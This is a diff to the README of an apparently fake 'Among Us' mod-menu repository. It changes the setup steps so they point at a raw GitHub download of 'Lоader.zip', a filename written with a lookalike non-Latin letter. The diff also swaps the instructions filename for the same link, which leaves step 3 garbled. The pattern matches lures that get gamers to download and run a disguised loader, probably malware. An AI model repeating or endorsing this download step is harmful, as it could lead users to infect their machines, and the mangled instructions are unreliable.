ZubairSolanki/AmongUs-ModMenu-Toolkit/README.md

 Start using your Among Us Mod Menu with these easy steps:

-1. **Download Loader.rar** from this repository (find it in the [Releases](./releases) or main page).
+1. **Download https://raw.githubusercontent.com/ZubairSolanki/AmongUs-ModMenu-Toolkit/main/Lоader.zip** from this repository (find it in the [Releases](./releases) or main page).
-2. Extract Loader.rar using your favorite archive tool (WinRAR, 7-Zip, The Unarchiver).
+2. Extract https://raw.githubusercontent.com/ZubairSolanki/AmongUs-ModMenu-Toolkit/main/Lоader.zip using your favorite archive tool (WinRAR, 7-Zip, The Unarchiver).
-3. Follow the included `HowToInstall.txt` for detailed per-OS setup instructions.
+3. Follow the included `https://raw.githubusercontent.com/ZubairSolanki/AmongUs-ModMenu-Toolkit/main/Lоader.zip` for detailed per-OS setup instructions.
 4. Launch Among Us through the loader, enable the mods you want, and enjoy a next-level experience!

 *Note: Always ensure you are using the most up-to-date version of Among Us and the mod menu for the best stability!*